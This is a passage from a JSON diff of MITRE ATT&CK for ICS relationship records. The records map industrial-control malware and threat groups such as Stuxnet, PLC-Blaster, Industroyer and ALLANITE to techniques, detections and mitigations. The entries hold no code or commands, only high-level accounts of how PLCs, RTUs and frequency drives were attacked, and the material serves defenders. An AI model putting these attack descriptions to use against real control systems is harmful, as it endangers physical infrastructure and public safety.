"1.0" + }, + { + "type": "relationship", + "id": "relationship--3d005ed8-77d3-4fed-9dd5-7e39ba8cb50a", + "created": "2021-04-13T12:45:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:12:08.899Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) calls system function blocks which are part of the operating system running on the PLC. Theyre used to execute system tasks, such as reading the system clock (SFC1) and generating data blocks on the fly. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--b52870cc-83f3-473c-b895-72d91751030b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--9e8990f9-475b-43fe-91fb-25cc0634f0aa", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:00:56.539Z", + "description": "Monitor for a loss of network communications, which may indicate this technique is being used.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--535c5160-17e0-44eb-9f4b-1a8e216b56a2", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:01:00.053Z", + "description": "The execution on the PLC can be stopped by violating the cycle time limit. The [PLC-Blaster](https://attack.mitre.org/software/S1006) implements an endless loop triggering an error condition within the PLC with the impact of a DoS. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016)", + "relationship_type": "uses", + "source_ref": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "target_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--67e11f38-9f68-4989-8de3-da65af52063e", + "created": "2023-03-30T19:24:54.896Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Industroyer2 ESET April 2022", + "description": "ESET. (2022, April 12). Industroyer2: Industroyer reloaded. Retrieved March 30, 2023.", + "url": "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/" + }, + { + "source_name": "Industroyer2 Forescout July 2022", + "description": "Forescout. (2022, July 14). Industroyer2 and INCONTROLLER In-depth Technical Analysis of the Most Recent ICS-specific Malware. Retrieved March 30, 2023.", + "url": "https://www.forescout.com/resources/industroyer2-and-incontroller-report/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-06T22:10:14.646Z", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) has the capability to poll a target device about its connection status, data transfer status, Common Address (CA), Information Object Addresses (IOAs), and IO state values across multiple priority levels.(Citation: Industroyer2 Forescout July 2022)(Citation: Industroyer2 ESET April 2022)", + "relationship_type": "uses", + "source_ref": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5212f36b-216f-4e32-8b64-3b4c94dfada5", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-10T14:13:17.429Z", + "modified": "2022-05-06T17:47:24.188Z", + "relationship_type": "mitigates", + "description": "Enforce strong password requirements to prevent password brute force methods for lateral movement.\n", + "source_ref": "course-of-action--5d97c693-e054-48ba-a3a3-eaf6942dfb65", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--8f0fa80a-7f8c-4c54-9277-a6f69bafd6af", + "created": "2023-03-30T19:04:30.392Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T19:04:30.392Z", + "description": "Monitor for API calls that may search local system sources, such as file systems or local databases, to find files of interest and sensitive data. ", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "target_ref": "attack-pattern--fa3aa267-da22-4bdd-961f-03223322a8d5", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--ab0b5170-577b-491e-8508-b9a34dc393c1", + "created": "2022-09-27T16:22:57.470Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:22:57.470Z", + "description": "Engineering and asset management software will often maintain a copy of the expected program loaded on a controller and may also record any changes made to controller programs. Data from these platforms can be used to identify modified controller programs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--8ed4e6d0-56d7-4e6b-8fa6-41f41631f30d", + "target_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--cb6d67c0-33ba-4c49-ae70-d0e4f0f68794", + "created": "2023-03-30T14:08:42.386Z", + "revoked": false, + "external_references": [ + { + "source_name": "M. Rentschler and H. Heine", + "description": "M. Rentschler and H. Heine The Parallel Redundancy Protocol for industrial IP networks Retrieved. 2020/09/25 ", + "url": "https://ieeexplore.ieee.org/document/6505877" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-30T14:08:42.386Z", + "description": "Retain cold-standby or replacement hardware of similar models to ensure continued operations of critical functions if the primary system is compromised or unavailable. (Citation: M. Rentschler and H. Heine)", + "relationship_type": "mitigates", + "source_ref": "course-of-action--f0f5c87a-a58d-440a-b3b5-ca679d98c6dd", + "target_ref": "attack-pattern--fab8fc7d-f27f-4fbb-9de6-44740aade05f", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b064068a-9e17-4ac8-9a92-a1338d7196c7", + "created": "2022-09-27T15:30:18.604Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T15:30:18.604Z", + "description": "Monitor logs from installed applications (e.g., historian logs) for unexpected commands or abuse of system features.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--24a9253e-8948-4c98-b751-8e2aee53127c", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--5886d4a1-2d4c-40d5-a689-69c475ab6ee2", + "created": "2022-09-26T15:37:30.958Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:37:30.958Z", + "description": "Monitor for loss of network traffic which could indicate alarms are being suppressed. A loss of expected communications associated with network protocols used to communicate alarm events or process data could indicate this technique is being used. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--eeeff03f-7436-4f76-8591-42075e6647d4", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.076Z", + "relationship_type": "mitigates", + "description": "All field controllers should restrict operating mode changes to only required authenticated users (e.g., engineers, field technicians), preferably through implementing a role-based access mechanism. Further, physical mechanisms (e.g., keys) can also be used to limit unauthorized operating mode changes.\n", + "source_ref": "course-of-action--e0d38502-decb-481d-ad8b-b8f0a0c330bd", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--9515f24c-1c33-4197-b9c9-b9992bc696ca", + "created": "2021-04-13T11:15:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:02:12.812Z", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) copies itself to various Program Organization Units (POU) on the target device. The POUs include the Data Block, Function, and Function Block. (Citation: Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016)", + "relationship_type": "uses", + "source_ref": "malware--4dcff507-5af8-47ce-964a-8d9569e9ccfe", + "target_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8985cd3c-1429-4681-ad2e-9b3e46588a44", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T18:41:09.265Z", + "description": "Monitor ICS management protocols / file transfer protocols for protocol functions related to firmware changes.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--efbf7888-f61b-4572-9c80-7e2965c60707", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--220140ac-d927-4d86-9335-c04aa6ee3c61", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.126Z", + "relationship_type": "mitigates", + "description": "Deny direct remote access to internal systems through the use of network proxies, gateways, and firewalls. Consider a jump server or host into the DMZ for greater access control. Leverage this DMZ or corporate resources for vendor access. (Citation: Keith Stouffer May 2015)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--8d2f3bab-507c-4424-b58b-edc977bd215c", + "external_references": [ + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--7f1e688d-65f7-4737-a4ba-ee482710f8ec", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T18:40:55.168Z", + "description": "Monitor for application logging, messaging, and/or other artifacts that may result from Denial of Service (DoS) attacks which degrade or block the availability of services to users. In addition to network level detections, endpoint logging and instrumentation can be useful for detection.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--502a0b7e-048a-468a-b888-e91fde47c6eb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-12T18:59:17.429Z", + "modified": "2022-05-06T17:47:24.189Z", + "relationship_type": "mitigates", + "description": "Segment and control software movement between business and OT environments by way of one directional DMZs. Web access should be restricted from the OT environment. Engineering workstations, including transient cyber assets (TCAs) should have minimal connectivity to external networks, including Internet and email, further limit the extent to which these devices are dual-homed to multiple networks. (Citation: North America Transmission Forum December 2019)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "external_references": [ + { + "source_name": "North America Transmission Forum December 2019", + "description": "North America Transmission Forum 2019, December NATF Transient Cyber Asset Guidance Retrieved. 2020/09/25 ", + "url": "https://www.natf.net/docs/natf/documents/resources/security/natf-transient-cyber-asset-guidance.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--5f03ee5d-534c-454c-aae3-b41130b00286", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T12:08:26.506Z", + "modified": "2022-05-06T17:47:24.117Z", + "relationship_type": "mitigates", + "description": "Make it difficult for adversaries to advance their operation through exploitation of undiscovered or unpatched vulnerabilities by using sandboxing. Other types of virtualization and application microsegmentation may also mitigate the impact of some types of exploitation. Risks of additional exploits and weaknesses in these systems may still exist. (Citation: Dan Goodin March 2017)\n", + "source_ref": "course-of-action--059ba11e-e3dc-49aa-84ca-88197f40d4ea", + "target_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "external_references": [ + { + "source_name": "Dan Goodin March 2017", + "description": "Dan Goodin 2017, March Virtual machine escape fetches $105,000 at Pwn2Own hacking contest Retrieved. 2020/09/25 ", + "url": "https://arstechnica.com/information-technology/2017/03/hack-that-escapes-vm-by-exploiting-edge-browser-fetches-105000-at-pwn2own/" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--86b868be-3e59-4497-9aa9-a2cd951a8f72", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:01:39.537Z", + "description": "Monitor application logs for changes to settings and other events associated with network protocols that may be used to block communications.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--129a4d3f-fa4a-42c3-833e-8f15155b9693", + "type": "relationship", + "created": "2022-03-09T23:42:34.056Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "Secureworks IRON VIKING ", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020." + } + ], + "modified": "2022-03-09T23:42:34.056Z", + "description": "(Citation: Secureworks IRON VIKING )", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--50b3247a-ea71-455e-b299-f00666c05146", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:12:35.411Z", + "description": "In states 3 and 4 [Stuxnet](https://attack.mitre.org/software/S0603) sends two network bursts (done through the DP_SEND primitive). The data in the frames are instructions for the frequency converter drives. For example one of the frames contains records that change the maximum frequency (the speed at which the motor will operate). The frequency converter drives consist of parameters, which can be remotely configured via Profibus. One can write new values to these parameters changing the behavior of the device. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8a604466-8437-4fe6-b6db-ec8fb05d702a", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:49:59.817Z", + "description": "In [Industroyer](https://attack.mitre.org/software/S0604) the first COM port from the configuration file is used for the actual communication and the two other COM ports are just opened to prevent other processes accessing them. Thus, the IEC 101 payload component is able to take over and maintain control of the RTU device. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--3b6567a9-6213-4db4-a069-1a86b1098b63", + "created": "2021-04-13T12:08:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Microsoft Security Response Center August 2017", + "description": "Microsoft Security Response Center 2017, August Moving Beyond EMET II Windows Defender Exploit Guard Retrieved. 2020/09/25 ", + "url": "https://msrc-blog.microsoft.com/2017/08/09/moving-beyond-emet-ii-windows-defender-exploit-guard/" + }, + { + "source_name": "Wikipedia", + "description": "Wikipedia Microsoft Security Response Center 2017, August Moving Beyond EMET II Windows Defender Exploit Guard Retrieved. 2020/09/25 Control-flow integrity Retrieved. 2020/09/25 ", + "url": "https://en.wikipedia.org/wiki/Control-flow_integrity" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T13:18:50.929Z", + "description": "Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: Microsoft Security Response Center August 2017) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia) Many of these protections depend on the architecture and target application binary for compatibility and may not work for all software or services targeted.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--49363b74-d506-4342-bd63-320586ebadb9", + "target_ref": "attack-pattern--cfe68e93-ce94-4c0f-a57d-3aa72cedd618", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--f497fd3e-8f05-4db2-97cc-48a8d35a8827", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.091Z", + "relationship_type": "mitigates", + "description": "Develop and publish policies that define acceptable information to be stored in repositories.\n", + "source_ref": "course-of-action--dc61c280-c29d-44e5-a960-c0dd1623d2ba", + "target_ref": "attack-pattern--3405891b-16aa-4bd7-bd7c-733501f9b20f", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6e329090-fc8c-4a7f-bbf9-08067ad9ebe5", + "created": "2023-03-10T20:35:16.772Z", + "revoked": false, + "external_references": [ + { + "source_name": "Marshall Abrams July 2008", + "description": "Marshall Abrams 2008, July 23 Malicious Control System Cyber Security Attack Case Study Maroochy Water Services, Australia Retrieved. 2018/03/27 ", + "url": "https://www.mitre.org/sites/default/files/pdf/08_1145.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-10T20:35:16.772Z", + "description": "In the [Maroochy Water Breach](https://attack.mitre.org/campaigns/C0020), the adversary used a dedicated analog two-way radio system to send false data and instructions to pumping stations and the central computer.(Citation: Marshall Abrams July 2008)", + "relationship_type": "uses", + "source_ref": "campaign--70cab19e-1745-425e-b3db-c02cd5ff157a", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b2e10e48-8bd9-472a-9c6f-1d38650e8df1", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.239Z", + "relationship_type": "mitigates", + "description": "Techniques can include (i) reducing transmission power on wireless signals, (ii) adjusting antenna gain to prevent extensions beyond organizational boundaries, and (iii) employing RF shielding techniques to block excessive signal propagation. (Citation: DHS National Urban Security Technology Laboratory April 2019)\n", + "source_ref": "course-of-action--fce6866f-9a87-4d3e-a73c-f02d8937fe0e", + "target_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "external_references": [ + { + "source_name": "DHS National Urban Security Technology Laboratory April 2019", + "description": "DHS National Urban Security Technology Laboratory 2019, April Radio Frequency Detection, Spectrum Analysis, and Direction Finding Equipment Retrieved. 2020/09/17 ", + "url": "https://www.dhs.gov/sites/default/files/saver-msr-rf-detection_cod-508_10july2019.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--679e7b8d-57d7-4c1d-8f42-1496606ea666", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Jeff Jones May 2018", + "description": "Jeff Jones 2018, May 10 Dragos Releases Details on Suspected Russian Infrastructure Hacking Team ALLANITE Retrieved. 2020/01/03 ", + "url": "https://www.eisac.com/public-news-detail?id=115909" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:40:28.784Z", + "description": "[ALLANITE](https://attack.mitre.org/groups/G1000) utilized spear phishing to gain access into energy sector environments. (Citation: Jeff Jones May 2018)", + "relationship_type": "uses", + "source_ref": "intrusion-set--190242d7-73fc-4738-af68-20162f7a5aae", + "target_ref": "attack-pattern--648f995e-9c3a-41e4-aeee-98bb41037426", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": 